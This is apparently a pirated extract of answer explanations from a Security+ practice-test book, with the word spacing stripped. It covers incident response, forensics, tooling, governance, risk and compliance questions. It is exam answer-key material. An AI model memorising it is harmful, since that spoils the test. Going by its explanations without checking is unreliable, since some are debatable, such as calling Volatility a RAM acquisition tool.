92. A. ThednsenumtoolcanperformmanyDomainNameSystem(DNS)-relatedfunctions,includingqueryingArecords,nameservers,andMXrecords,aswellasperformingzonetransfers,Googlesearchesforhostsandsubdomains,andnetrangereverselookups.digandhostareusefulfor
Telegram Channel @nettrain
DNSqueriesbutdonotprovidethisrangeofcapabilities,anddnscatwasmadeupforthisquestion.
93. C. Jillwantstheleastpossiblechangestooccuronthesystem,sosheshouldinstructtheusertonotsaveanyfilesormakeanychanges.Rebootingthesystemwillnotcreateamemorydump,andmaycausenewfilestobewrittenorchangedifpatcheswerewaitingtoinstallorotherchangesaresettooccurduringareboot.Turningoffsecuredeleteormakingotherchangeswillnotimpactthefilesthatweredeletedpriortothatsettingchange.
94. C. Anti-forensicsactivitiesfollowlateralmovementintheCyberKillChainmodel.Ithelpstorememberthatafteranattackerhascompletedtheirattack,theywillattempttohidetracesoftheirefforts,andthenmayproceedtodenial-of-serviceorexfiltrationactivitiesinthemodel.
95. B. TheIRprocessusedfortheSecurity+examoutlineisPreparation,Identification,Containment,Eradication,Recovery,andLessonsLearned.Veronicashouldmoveintothelessonslearnedphase.
96. C. Quickformattingmerelydeletesfileindexesratherthanremovingandoverwritingfiles,makingitinappropriateforsanitization.Physicaldestructionwillensurethatthedataisnotreadable,aswilldegaussingandzerowiping.
97. D. MicrosoftOfficeplacesinformationlikethenameofthecreatorofthefile,editors,creationandchangedates,andotherusefulinformationinthefilemetadatathatisstoredineachOfficedocument.BartcansimplyopentheOfficedocumenttoreviewthisinformationorcanuseaforensicorfilemetadatatooltoreviewit.Filenamesmaycontainthecreator’sname,butthiswouldonlybeifthecreatorincludedit.MicrosoftOfficedoesnotcreateormaintainalog,andtheapplicationlogforWindowsdoesnotcontainthisinformation.
98. B. WindowsDefenderFirewalloperatesonaper-applicationmodelandcanfiltertrafficbasedonwhetherthesystemisonatrustedprivatenetworkorapublicnetwork.NathanielshouldallowChromebynameinthefirewall,whichwillallowittosendtrafficwithoutneedingtospecifyportsorprotocols.
99. B. ThednsenumPerlscriptbuildsinquiteafewDomainNameSystem(DNS)enumerationcapabilities,includinghost,nameserver,andMXrecordgathering;zonetransfer;Googlescrapingfordomains;subdomain
Telegram Channel @nettrain
bruteforcingfromfiles;aswellasWhoisautomationandreverselookupsfornetworksuptoclassCinsize.Althoughyoucouldmanuallyusedigornslookuporevennetcattoperformmanyofthesefunctions,dnsenumistheonlyautomatedtoolonthelist.
100. B. Buildingatimeline,particularlyfrommultiplesystems,reliesonaccuratelysetsystemclocksoraddingamanuallyconfiguredoffset.Diskhashingandacquisitiondoesnotneedanaccuratesystemclock,andfilemetadatacanbereviewedevenwithoutanaccurateclock,althoughaccurateclockinformationorknowingtheoffsetcanbeusefulforanalysis.
101. B. Databreachnotificationlawsoftenbuildinamaximumlengthoftimethatcanpassbeforenotificationisrequired.Theyalsooftenincludeathresholdfornotification,withamaximumnumberofexposedindividualsbeforethestateorotherauthoritiesmustbenotified.Theydonotincludeamaximumnumberofindividualswhocanbenotified,nordotheytypicallyhavespecificrequirementsaboutpoliceinvolvementinforensicinvestigationsorcertificationtypesorlevels.
102. C. Adatalossprevention(DLP)toolthatcanscanandreviewemailsforSSNstyledataisthemosteffectivetoollistedhere.NaomimaywanttosetthetooltoblockallemailswithpotentialSSNs,andthenreviewthoseemailsmanuallytoensurethatnofurtheremailsleavewhileallowinglegitimateemailstopassthrough.Anintrusiondetectionsystem(IDS)mightlooktemptingasananswer,butanIDScanonlydetect,notstop,thetraffic,whichwouldallowtheSSNstoexittheorganization.Antimalwareandfirewallswillnotstopthistypeofevent.
103. C. Emailheaderscontainasignificantamountofmetadata,includingwheretheemailwassentfrom.Thefrom:fieldlistsasenderbutdoesnotindicatewheretheemailwasactuallysentfrom.Theto:fieldlistswhotheemailwassentto,andfootersarenotusedtostorethisinformationforemail.
104. A. Jurisdictionalboundariesexistbetweenstatesandlocalities,aswellascountries,makingitchallengingforlocallawenforcementtoexecutewarrantsandacquiredatafromorganizationsoutsideoftheirjurisdictioninmanycases.Venueisusedtodescribewherealegalcaseisconducted.Legislationmayormaynothaveanimpact,andbreachlawsareunlikelytoimpactthisbutwouldguideHenryaboutwhennotificationsofabreachwouldneedtooccur.
Telegram Channel @nettrain
105. A. OliviashoulduseJohntheRipper.AlthoughbothJohntheRipperandrainbowtabletoolslikeOphcrackcanbeusedtocrackpasswords,JohntheRipperwillprovideabetterviewofhowhardthepasswordwastocrack,whereasrainbowtabletoolswillsimplydetermineifthepasswordhashcanbecracked.Crack.itandTheHunterweremadeupforthisquestion.
106. B. TheFederalEmergencyManagementAgency(FEMA),partoftheDepartmentofHomelandSecurity,isinchargeofContinuityofOperationsPlanning(COOP),whichisarequirementforfederalagencies.TheU.S.DepartmentofAgriculture(USDA),theNationalSecurityAgency(NSA),andtheFederalBureauofInvestigations(FBI)arenotinchargeofContinuityofOperationsPlanning.
107. B. WindowsconfigurationdatacanbequeriedusingPowerShell,allowingElainetowritescriptsthatwillgathersecurityconfigurationdata.BashisashellusedforLinuxsystems.AlthoughWindowssystemscannowrunBashintheLinuxsubsystem,itisn’tinstalledbydefault.SecureShell(SSH)isusedforremoteshellaccess,andPythoncouldbeusedbutwouldneedtobeinstalledspecificallyforthispurposeandisn’tavailablebydefault.
108. C. ThebestoptionlistedisaWiresharkcaptureoftrafficfromthephone.Insomecases,thistrafficmaybeencrypted,andRamonmayneedtotakeadditionalstepstodecryptthedata.CallmanagerlogsandSessionInitiationProtocol(SIP)logsdonotincludethefullaudioofaconversation.
109. C. NXLogisalogcollectionandcentralizationtool.IPFIX,NetFlow,andsFlowallgatherdataaboutnetworktraffic,includingsource,destination,port,protocol,andamountofdatasenttobecollected.
110. A. Petehasisolatedthesystembyplacingitonaseparatelogicalnetworksegmentwithoutaccess.Somemalwarecandetectifsystemslosetheirnetworkconnection,andPetemaywanttoperformforensicsviathenetworkormonitorattemptstosendoutboundtraffic,meaningthatsimplyunpluggingthesystemmaynotmeethisneeds.Containmentwouldinvolvelimitingthespreadorimpactofanattack,segmentationplacessystemsingroupsbasedonrulesorsecuritygroupings,anderadicationisapartoftheincidentresponse(IR)processwherecomponentsofanincidentorattackareremoved.
111. C. Virtualmachineforensicstypicallyrelyonasnapshotgatheredusing
Telegram Channel @nettrain
theunderlyingvirtualizationenvironment’ssnapshotcapabilities.Thiswillcapturebothmemorystateandthediskforthesystemandcanberunonanindependentsystemoranalyzedusingforensictools.
112. B. ThetcpreplaytoolisspecificallydesignedtoallowPCAPcapturefilestobereplayedtoanetwork,allowingexactlythistypeoftesting.hpingcanbeusedtocraftpackets,butit’snotdesignedtoreplaycapturefiles.tcpdumpisusedtocapturepackets,butagain,itnotareplaytool,andCuckooisasandboxingtoolfortestingandidentifyingmalwarepackages.
113. C. Windowscreatesadumpfile,whichcontainsallthecontentsofactivememorytoallowanalysisofthecrash.
114. D. Segmentinganetworkbasedonsecurityorrisklevelshelpsensurethatattacksandcompromisesareconstrainedtothesametypeofsystemsordeviceswithsimilarlevelsofsecurityrequirements.Isolationwouldremoveadeviceorsystemfromcontactwiththenetworkorothersystems.FragmentationandtieringarenottermsusedfortheSecurity+exam.
115. A. Taggingeachdrivehelpswithinventoryandensuresthatthedriveistrackedproperlyandthatthechainofcustodycanbemaintained.Takingapicturemaybeusefultoidentifythedrive,buttaggingandinventorycontrolaremoreimportant.Drivesarenotlabeledwithanorderofvolatilitybecausetheorderofvolatilityisassociatedwiththetypeofforensictarget,notwithaspecificdrive.Interviewsmaybeusefulbutarenotalwaysconductedwitheverypersonwhosemachineisimaged.
116. B. Theprovenanceofaforensicartifactincludesthechainofcustody,includingownershipandacquisitionoftheartifact,device,orimage.E-discoveryistheprocessofdoingdiscoveryinelectronicformatsforlitigation,investigations,andrecordsrequests.Jurisdictionistheregionorareawherelawsorlawenforcementhasauthority.Volatilityishowlikelyadeviceorcomponentistochange.
117. B. TheVolatilityframeworkisapurpose-builttoolfortheacquisitionofrandomaccessmemory(RAM)fromalivesystem.Autopsyisaforensictoolfordriveanalysisandforensicinvestigations,ddisusedtoimagedrives,andnetcatisatoolusedtotransferdataortomakeconnectionstosystemsacrossanetwork.
118. D. Wiresharkisanetworkprotocolanalyzerandcapturetoolthatcanbeusedfortroubleshootingincircumstanceslikethis.Infact,securitypractitionersareoftenaskedtoverifythattrafficisbeingreceivedproperly
Telegram Channel @nettrain
aspartoffirewallruletroubleshooting.Randymaywanttocapturetrafficatbothendsofthecommunicationtomakesurethattheclientsaresendingtrafficproperlyandthentomatchthattothesametrafficbeingreceived—orgoingmissing—attheotherend.tracertandtracerouteareusefulforvalidatingtheroutethattraffictakesbutwouldnotshowifHTTPSpacketswerebeingblocked,andSn1perisapentestframeworkthatallowsautomatedpentesting.
119. B. Theoldestandleastcapabletoollistedissyslog,theoriginalsystemloggingtoolforLinuxandUnixsystems.Theotherthreeoptionshaveadvancedfeatures,whichmeanthattheyaremorebroadlyimplementedwhenflexibilityandreliabilityareneeded.
120. A. Theonlytoolonthislistthatcanbeusedtocraftpacketsishping.SusancouldusethesamplecodeorexploitbybuildingthenecessarypacketwithhpingandthensendingittoaDynamicHostConfigurationProtocol(DHCP)serverinhernetworkwhilemonitoringwithherintrusionpreventionsystem(IPS).ShemaywanttocaptureallofhertrafficwithWiresharkortcpdumptoobservewhathappensonbothendstoo!
121. D. SQLinjectionattemptsaresentasHTTPorHTTPSrequeststoawebserver,meaningthatValeriewillbeabletoseetheattacksinthewebserverlog.DomainNameSystem(DNS)logs,ifavailable,willnotshowthese.Authlogsshowlogins,notweborSQLServerqueriesorrequests.UnlikeWindows,thereisnosecuritylogfileforLinux,althoughthereisasecurelogforsomesystems.
122. A. Iftheprivatekeyandthepassphraseforacertificateareexposed,thecertificateshouldberevoked.Anewcertificatewillneedtobeissued,butthecertificatecannotbetrustedandrevocationisthefirststeptohandletheissueproperly.Changingthepasswordwillnothelp,andchangingtheprivateorpublickeywillrequireanewcertificate.
123. C. Alegalholdnoticewillinformthecompanythattheymustpreserveandprotectinformationrelatedtothecase.Noneoftheotheritemsaretermsusedinthisprocess.
124. B. netstatcanshowallactiveconnections,andusingthe-aflagwilldoso.netstatdoesnotprovidea-ccommandflag.Theroutecommandisusedtomodifyanddisplaythesystem’sroutingtable.hpingisapacketanalyzerandpacketbuildingtooloftenusedtocraftspecificpacketsaspartofpenetrationtestsandattacks.
Telegram Channel @nettrain
125. B. Aquarantinesettingwillplaceamaliciousorsuspectfileinasafelocationandwillkeepitthereuntilasettimeframehaspassedoruntilanadministratortakesactiontodealwithit.Thiscanallowyoutofurtheranalyzethefileortorestoreitifitwasanincorrectidentificationorifthefileisneededforanotherpurpose.Containmentisusedtolimittheextentofanincidentorattack,isolationkeepsasystemordevicefromconnectingtooraccessingothers,anddeletingafilewouldn’tkeepitaround.
126. D. AlthoughLinuxsystemscanuseafileforswapspace,acommonsolutionistouseaseparatepartitionforswapspace.
127. A. Trackingmultipledrivesrequirescarefulinventory,evidencehandlinglogging,andtaggingofthedrivestoensurethattheyaretherightdriveandthattheyaretrackedthroughouttheforensicinvestigation.Marcoshouldcarefullytageachofthedrivesandensurethatthosetagsareusedthroughouttheinvestigation.
128. D. The-vflagfornetcatsetsittoverbosemode.ThatmeansthatIsaachasattemptedtoconnecttoeveryportfrom1to1024on10.11.10.1usingnetcat.Sincetherearenootherflagsoroptions,itwillsimplytrytoconnect,andthenprovideaverboseresultaboutwhathappened,resultinginasimplebuteffectiveportscan.
129. B. Tony’sbestoptionislikelycontainment.Hemaywanttoremovethatlocationfromthecorporatenetworkortopreventmosttrafficfrombeingpermitteduntilhecantakeadeeperlookintowhatisgoingon.Ifheisolatedtheentiresite,hemightdisruptcriticalbusinessoperations,andsegmentationwouldhavebeenmoreappropriatebeforetheeventoccurred.
130. C. Right-to-auditclausesarecommonlyacceptedaspartofserviceandleasingcontractsregardlessoflocationfordatacenterco-locationandfacilityrentalcontracts.Cloudserviceproviders,however,arelesslikelytosignaright-to-auditcontract.Instead,theymayprovidethird-partyauditdatatocustomersoreventopotentialcustomers.
131. D. ThebestoptionforAlainawouldbetouseaURLfiltertoblockusersfromvisitingthelinkinthephishingemail.AWAF,orwebapplicationfirewall,isdesignedtopreventattacksagainstawebapplication.Patchingcanhelpstopexploitsofvulnerableservicesorsystems,butthisisaphishingattack,andanallowlistlistsalloweditems,notblockeditems,andlimitingwhichwebsitesanentirecompanycanvisitisalmostimpossibleinmostcircumstances.
Telegram Channel @nettrain
132. A. Playbookslisttheactionsthatanorganizationwilltakeaspartofaresponseprocess.Arunbookliststhestepsrequiredtoperformanactionlikenotification,removingmalware,orsimilartasks.Playbookstendtobeusedtodocumentprocesses,whereasrunbookstendtobeusedforspecificactions.Adisasterrecovery(DR)planisusedtorecoverfromdisasters,andabusinesscontinuity(BC)planisusedtoensurethattheorganizationcontinuestofunction.
133. B. SinceMACaddressesareonlyvisiblewithinabroadcastdomain(localnetwork),theMACaddressesofexternalhostscannotberetrievedusingthearpcommand.TheMACaddressesforlocalsystems,theIPaddressesofthelocalhost,andwhethertheyaredynamicorstaticcanallbedeterminedusingthearpcommand.
134. C. Thejournalctltoolisusedtoquerythesystemdjournal.Onsystemd-enabledLinuxdistributions,thejournalcontainskernelandbootmessagesaswellassyslogmessagesandmessagesfromservices.
135. C. Therecoveryphaseofteninvolvesaddingfirewallrulesandpatchingsystemsinadditiontorebuildingsystems.Althoughpreparationmayinvolveconfiguringfirewallrulesorregularpatching,itdoesnotdosoinresponsetoanincident.Containmentmightinvolvebothbutislesslikelyto,sincethefocuswillbeonbroaderfixes,anderadicationworkstoremovethethreat.
136. A. Thecurlcommand-linetoolsupportsdownloadsanduploadsfromawidevarietyofservices,anditwouldbetheidealsolutionforthisscenario.hpingisusedforcraftingpackets,nmapisaportscanner,andtheHarvesterisanopensourceintelligencegatheringtool,noneofwhichmeetGary’sneeds.
137. C. Garyshouldlookatthetrendinformationformalwaredetectionstochecktoseeiftherearemoreinfectionsbeingdetectedthanduringrecentweeks.Thiscanbeausefulindicatorofachange,eitherduetoanewmalwaretechniqueorpackage,asuccessfulattackthathasresultedinstaffmembersclickingonmaliciouslinksoropeningmaliciousemails,orotherpathsintotheorganization.Garycouldthencheckwithuserswhosesystemsreportedthemalwaretoseewhathadoccurred.Alertsmightshowtheinfectionsbutwouldnotshowthedataovertimeaseasilyastrends.Sensorswillshowindividualplacesdataisgathered,andbandwidthdashboardscanshowusefulinformationaboutwhichsystemsareusing
Telegram Channel @nettrain
moreorlessbandwidth,butthetrendsdashboardremainstherightplaceforhimtolookinthissituation.
138. B. Althoughitcanbeeasytofocusonthedigitalpartofdigitalforensics,interviewswithendusersandothersinvolvedinanincidentcanbeakeyelementofaforensicinvestigation.Investigatorsstillneedtogatherinformationandrecordwhattheyfound,butaninterviewcanprovidefirsthandknowledgeandadditionaldetailsthatmaynotbeabletoberecoveredviatechnicalmeanslikeemailordiskforensics.Achainofcustodydoesnotprovideinformationaboutreportsfromendusers.
139. B. TheonlyoptiononthislistthatsupportsAaron’srequirementsisNXLog.SyslogcanreceiveWindowseventsiftheyareconvertedtosyslog,butitisn’tanativefeature.IPFIXisanetworkflowstandard,andjournalctlisusedtoaccessthesystemdjournal.
140. A. Typicalexercisetypesformostorganizationsincludesimulationsthatemulateanactualincidentresponseprocess,walk-throughsthatguidestaffthroughanevent,andtabletopexercisesthataregamedoutwithouttakingactualaction.Drillsareclassifiedasmorefocusedonspecificactionsorfunctions,andtheyarelesscommonbecausetheycanresultininadvertentactionormistakesanddonotcoverthebreadthofanincident.
141. A. Oftheoptionslisted,netstatistheonlytoolthatwillnotperformaportscan.
142. C. ThetopofthediamondshouldbelabeledAdversary,oneofthefourverticesontheDiamondmodel.
143. C. Electronicdiscovery,ore-discovery,isthelegalproceedinginvolvedinlitigation,FoIArequests,andsimilareffortsthatproduceinformationinelectronicform.Emailforensicscouldberequiredtorecoverdatainaninvestigation,butthereisnoindicationinthequestionofanyneedforforensicinvestigation.InquisitionsandprovenancearenotconceptsfortheSecurity+exam.
Telegram Channel @nettrain
Chapter5:Governance,Risk,andCompliance1. A. CarolineshouldselectISO27002.ISO27002isaninternational
standardforimplementingandmaintaininginformationsecuritysystems.ISO27017isaninternationalstandardforcloudsecurity;NIST800-12isageneralsecuritystandardanditisaU.S.standard,notaninternationalone;andNIST800-14isastandardforpolicydevelopment,anditisalsoaU.S.standard,notaninternationalone.
2. B. Ifasystemisinfectedwithmalware,themalwarewilloperatewiththeprivilegesofthecurrentuser.Ifyouusenonadministrativeaccounts,withleastprivileges,thenthemalwarewon’tbeabletoaccessadministrativefunctionalitywithoutaprivilegeescalationcapability.
3. D. Leastprivilegeisthemostfundamentalconceptinestablishingaccounts.Eachusershouldhavejustenoughprivilegestodotheirjob.Thisconceptalsoappliestoserviceaccounts.Althougheachoftheotheroptionsissomethingyouwouldconsider,theyarenotascriticalastheprincipleofleastprivilege.
4. C. Changemanagementistheprocessofdocumentingallchangesmadetoacompany’snetworkandcomputers.Avoidingmakingchangesatthesametimemakestrackinganyproblemsthatcanoccurmuchsimpler.Duediligenceistheprocessofinvestigationandverificationoftheaccuracyofaparticularact.Acceptableusepoliciesstatewhatactionsandpracticesareallowedinanorganizationwhileusingtechnology.Duecareistheeffortmadebyareasonablepartytoavoidharmtoanother.Itisthelevelofjudgment,care,determination,andactivityapersonwouldreasonablyexpecttodoundercertainconditions.
5. A. Anacceptableusepolicy(AUP)isadocumentstatingwhatausermayormaynothaveaccesstoonacompany’snetworkortheInternet.Acleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.Mandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.Jobrotationisapolicythatdescribesthepracticeofmovingemployeesbetweendifferenttasks.Jobrotationcanhelpdetectfraudbecauseemployeescannotperformthesameactionsforlongperiodsoftime.
Telegram Channel @nettrain
6. C. ThePCI-DSS,orPaymentCardIndustryDataSecurityStandard,isasecuritystandardthatismandatedbycreditcardvendors.ThePaymentCardIndustrySecurityStandardsCouncilisresponsibleforupdatesandchangestothestandard.GDPR,ortheGeneralDataProtectionRegulation,isastandardfordataprivacyandsecurityintheEuropeanUnion(EU).COPPAistheChildren’sOnlinePrivacyProtectionAct,aU.S.federallaw.CISistheCenterforInternetSecurityandisnotalaworaregulation.
7. A. Companieswillusemandatoryvacationpoliciestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivities.Cleandeskpolicyensuresthatallsensitive/confidentialdocumentsareremovedfromanend-userworkstationandlockedupwhenthedocumentsarenotinuse.Anondisclosureagreement(NDA)protectssensitiveandintellectualdatafromgettingintothewronghands.Continuingeducationistheprocessoftrainingadultlearnersinabroadlistofpostsecondarylearningactivitiesandprograms.Companieswillusecontinuingeducationintrainingtheiremployeesonthenewthreatsandalsoreiteratingcurrentpoliciesandtheirimportance.
8. B. Lockingcabinetsanddrawersisthebestsolutionbecausetheyallowindividualstolocktheirdrawersandensurethataccesstoasinglekeydoesnotallowbroadaccesstodocumentslikeadepartmentdoorlockorproximitycardsforthespace.Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystemandwouldnothelpwithsecuringdocuments,butitmightteachtheprocessofdoingso.
9. D. Quantitativeriskassessmentistheprocessofassigningnumericalvaluestotheprobabilityaneventwilloccurandwhattheimpactoftheeventwillhave.Changemanagementistheprocessofmanagingconfigurationchangesmadetoanetwork.Vulnerabilityassessmentattemptstoidentify,quantify,andranktheweaknessesinasystem.Qualitativeriskassessmentistheprocessofrankingwhichriskposesthemostdangerusingratingslikelow,medium,andhigh.
10. D. Amemorandumofunderstanding(MOU)isatypeofagreementthatisusuallynotlegallybinding.Thisagreementisintendedtobemutuallybeneficialwithoutinvolvingcourtsormoney.AnSLA(servicelevelagreement)definesthelevelofservicethecustomerexpectsfromtheserviceprovider.Thelevelofservicedefinitionsshouldbespecificandmeasurableineacharea.ABPA(businesspartnershipagreement)isalegal
Telegram Channel @nettrain
agreementbetweenpartners.Itestablishestheterms,conditions,andexpectationsoftherelationshipbetweenthepartners.AnISA(interconnectionsecurityagreement)isanagreementthatspecifiesthetechnicalandsecurityrequirementsoftheinterconnectionbetweenorganizations.
11. A. Escalationisnecessaryincaseswherethecurrentbreachgoesbeyondthescopeoftheorganizationorinvestigatorsorisrequiredbylaw.Inthiscase,Sallybelievesacrimehasbeencommittedandhasescalatedthecasetolawenforcement.Otherescalationsmightbetofederalorstatelawenforcement,ortoothermorecapableinternalorexternalinvestigators.Tokenizingdatausesadeidentifiedreplacementdataitem,publicnotificationnotifiesthepopulationorcustomersatlarge,andoutsourcinginvestigationsmaybedoneifspecializedskillsareneeded.
12. A. Thesinglelossexpectancy(SLE)istheproductofthevalue($16,000)andtheexposurefactor(.35),or$5,600.
13. C. Antivirusisanexampleofacorrectivecontrol.Acorrectivecontrolisdesignedtocorrectasituation.AnIDS(intrusiondetectionsystem)isadetectivecontrolbecauseitdetectssecuritybreaches.Anauditlogisadetectivecontrolbecauseitdetectssecuritybreaches.Arouterisapreventivecontrolbecauseitpreventssecuritybreacheswithaccesscontrollists(ACLs).
14. A. Adeterrentcontrolisusedtowarnapotentialattackernottoattack.Lightingaddedtotheperimeterandwarningsignssuchasa“notrespassing”signaredeterrentcontrols.Theotheroptionsareexamplesofdetectivecontrols.Adetectivecontrolisdesignedtouncoveraviolation,althoughsomedetectivecontrolsmayserveasadeterrent—forexample,whenacameraisvisible,theyarenotprimarilydeterrentcontrols.
15. D. Testingandtrainingarepreventiveadministrativecontrols.Administrativecontrolsdictatehowsecuritypoliciesshouldbeexecutedtoaccomplishthecompany’ssecuritygoals.Adetectivetechnicalcontroluncoversaviolationthroughtechnology.Apreventivetechnicalcontrolattemptstostopaviolationthroughtechnology.Detectiveadministrativecontrolsuncoveraviolationthroughpolicies,procedures,andguidelines.
16. A. Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Risktransferistheactofmovingthe
Telegram Channel @nettrain
risktohostedproviderswhoassumetheresponsibilityforrecoveryandrestorationorbyacquiringinsurancetocoverthecostsemergingfromarisk.Riskavoidanceistheremovalofthevulnerabilitythatcanincreaseaparticularrisksothatitisavoidedaltogether.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.
17. D. Inmostcases,operatingafacilityinastateissufficientreasontoneedtocomplywithstatelaws.Jimshouldcheckwithalawyer,butheshouldplanonneedingtocomplywithIllinois,Indiana,andOhiolaw,aswellasfederallaws.
18. A. Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystem.Offboardingistheprocessofremovinganemployeefromthecompany’sidentityandaccessmanagementsystem.Adverseactionisanofficialpersonnelactionthatistakenfordisciplinaryreasons.Jobrotationgivesindividualstheabilitytoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.
19. A. Acleandeskpolicyensuresthatsensitiveinformationanddocumentsarenotleftondesksafterhoursandrequiresemployeestoplacethosefilesintoalessexposedorsecurelocation.Backgroundchecks,continuingeducation,andjobrotationdonotprotectconfidentialinformationleftondesksfrombeingexposed.
20. A. Asusersregisterforanaccount,theyenterlettersandnumberstheyaregivenonthewebpagebeforetheycanregister.Thisisanexampleofadeterrentcontrolsinceitpreventsbotsfromregisteringandprovesthisisarealperson.Detectivecontrolsdetectintrusionasithappensanduncoversaviolation.Acompensatingcontrolisusedtosatisfyarequirementforasecuritymeasurethatistoodifficultorimpracticaltoimplementatthecurrenttime.Degaussingisamethodofremovingdatafromamagneticstoragemediabychangingthemagneticfield.
21. D. Aparkingpolicygenerallyoutlinesparkingprovisionsforemployeesandvisitors.Thisincludesthecriteriaandproceduresforallocatingparkingspacesforemployeesandisnotapartoforganizationalsecuritypolicy.
Telegram Channel @nettrain
Instead,itisanoperationalorbusinesspolicy.Anacceptableusepolicydescribesthelimitsandguidelinesforuserstomakeuseofanorganization’sphysicalandintellectualresources.Thisincludesallowingorlimitingtheuseofpersonalemailduringworkhours.SocialmediapolicydefineshowemployeesshouldusesocialmedianetworksandapplicationssuchasFacebook,Twitter,LinkedIn,andothers.Itcanadverselyaffectacompany’sreputation.Passwordpoliciesdefinethecomplexityofcreatingpasswords.Itshouldalsodefineweakpasswordsandhowusersshouldprotectpasswordsafety.
22. C. Proprietarydataisaformofconfidentialinformation,andiftheinformationisrevealed,itcanhavesevereeffectsonthecompany’scompetitiveedge.Highisagenericlabelassignedtodatainternallythatrepresentstheamountofriskbeingexposedoutsidethecompany.Thetop-secretlabelisoftenusedingovernmentalsystemswheredataandaccessmaybegrantedordeniedbasedonassignedcategories.Lowisagenericlabelassignedtodatainternallythatrepresentstheamountofriskbeingexposedoutsidethecompany.
23. C. Antivirussoftwareisusedtoprotectcomputersystemsfrommalwareandisnotaphysicalsecuritycontrol.Physicalcontrolsaresecuritymeasuresputinplacetoreducetheriskofharmcomingtoaphysicalproperty.Thisincludesprotectionofpersonnel,hardware,software,networks,anddatafromphysicalactionsandeventsthatcouldcausedamageorloss.
24. A. Quantitativeriskassessmentistheprocessofassigningnumericalvaluestotheprobabilityaneventwilloccurandwhatimpacttheeventwillhave.Qualitativeriskassessmentistheprocessofrankingwhichriskposesthemostdangersuchaslow,medium,andhigh.Abusinessimpactanalysis(BIA)isusedtoevaluatethepossibleeffectabusinesscansuffershouldaninterruptiontocriticalsystemoperationsoccur.Thisinterruptioncouldbeasaresultofanaccident,emergency,ordisaster.Threatassessmentistheprocessofidentifyingandcategorizingdifferentthreatssuchasenvironmentalandperson-made.Italsoattemptstoidentifythepotentialimpactfromthethreats.
25. D. Anondisclosureagreement(NDA)protectssensitiveandintellectualdatafromgettingintothewronghands.AnNDAisalegalcontractbetweenthecompanyandthird-partyvendortonotdiscloseinformationpertheagreement.Encrypteddatathatissentcanstillbedecryptedbythethird-
Telegram Channel @nettrain
partyvendoriftheyhavetheappropriatecertificateorthekeybutdoesnotrestrictaccesstothedata.ViolatinganNDAwouldconstituteunauthorizeddatasharing,andaviolationofprivilegeduserrole-basedawarenesstraininghasnothingtodowithsharingproprietaryinformation.
26. A. DetectivecontrolslikeCCTVdetectintrusionasithappensandcanhelpuncoverviolations.Policiesareadministrativecontrols.Firewallsandintrusionpreventionsystem(IPS)devicesaretechnicalcontrols.Technicalcontrolsareappliedthroughtechnologyandmaybealsobedeterrent,preventive,detective,orcompensating.
27. C. Sharingofprofitsandlossesandtheadditionorremovalofapartner,aswellastheresponsibilitiesofeachpartner,aretypicallyincludedinaBPA(businesspartneragreement).ExpectationsbetweenpartiessuchasacompanyandanInternetserviceprovideraretypicallyfoundinaservicelevelagreement(SLA).Expectationsincludethelevelofperformancegivenduringthecontractualservice.AnSLAwillprovideaclearmeansofdeterminingwhetheraspecificfunctionorservicehasbeenprovidedaccordingtotheagreed-onlevelofperformance.SecurityrequirementsassociatedwithinterconnectingITsystemsaretypicallyfoundinaninterconnectionsecurityagreement,orICA.
28. D. Abackupgeneratorisacompensatingcontrol—analternatecontrolthatreplacestheoriginalcontrolwhenitcannotbeusedduetolimitationsoftheenvironment.Afirewallisconsideredapreventivecontrol,asecurityguardisconsideredaphysicalcontrol,andanIDS(intrusiondetectionsystem)isconsideredadetectivecontrol.
29. A. Preventivecontrolsstopanactionfromhappening—inthisscenario,preventinganunauthorizeduserfromgainingaccesstothenetworkwhentheuserstepsaway.Acorrectivecontrolisdesignedtocorrectasituation,adeterrentcontrolisusedtodeterasecuritybreach,andadetectivecontrolisdesignedtouncoveraviolation.
30. C. Jobrotationallowsindividualstoseevariouspartsoftheorganizationandhowitoperates.Italsoeliminatestheneedforacompanytorelyononeindividualforsecurityexpertiseshouldtheemployeebecomedisgruntledanddecidetoharmthecompany.
Recoveringfromadisgruntledemployee’sattackiseasierwhenmultipleemployeesunderstandthecompany’ssecurityposture.Separationofdutiesistheconceptofhavingmorethanonepersonrequiredtocompleteatask,
Telegram Channel @nettrain
allowingproblemstobenotedbyothersinvolved.Amandatoryvacationpolicyisusedbycompaniestodetectfraudbyhavingasecondperson,familiarwiththeduties,helpdiscoveranyillicitactivitieswhilethepersonwhonormallyperformsthemisoutoftheoffice.Onboardingistheprocessofaddinganemployeetoacompany’sidentityandaccessmanagementsystemorotherinfrastructure.
31. B. Dataminimizationistheprocessofensuringthatonlydatathatisrequiredforbusinessfunctionsiscollectedandmaintained.Tonyshouldensurethathisorganizationisminimizingthedatacollected.Datamaskingredactsdatabutdoesnotdecreasehowmuchiscollected.Tokenizationreplacessensitivevalueswithauniqueidentifierthatcanbelookedupinalookuptable.Anonymizationremovestheabilitytoidentifyindividualsfromdatabutisquitedifficult.
32. A. Riskavoidanceisastrategytodeflectthreatsinordertoavoidthecostlyanddisruptiveconsequencesofadamagingevent.Italsoattemptstominimizevulnerabilitiesthatcanposeathreat.Ariskregisterisadocumentthattracksanorganization’srisksandinformationabouttheriskslikewhoownsit,ifitisbeingremediated,andsimilardetails.Riskacceptanceisastrategyofrecognizing,identifying,andacceptingariskthatissufficientlyunlikelyorthathassuchlimitedimpactthatacorrectivecontrolisnotwarranted.Riskmitigationiswhenacompanyimplementscontrolstoreducevulnerabilitiesorweaknessesinasystem.Itcanalsoreducetheimpactofathreat.
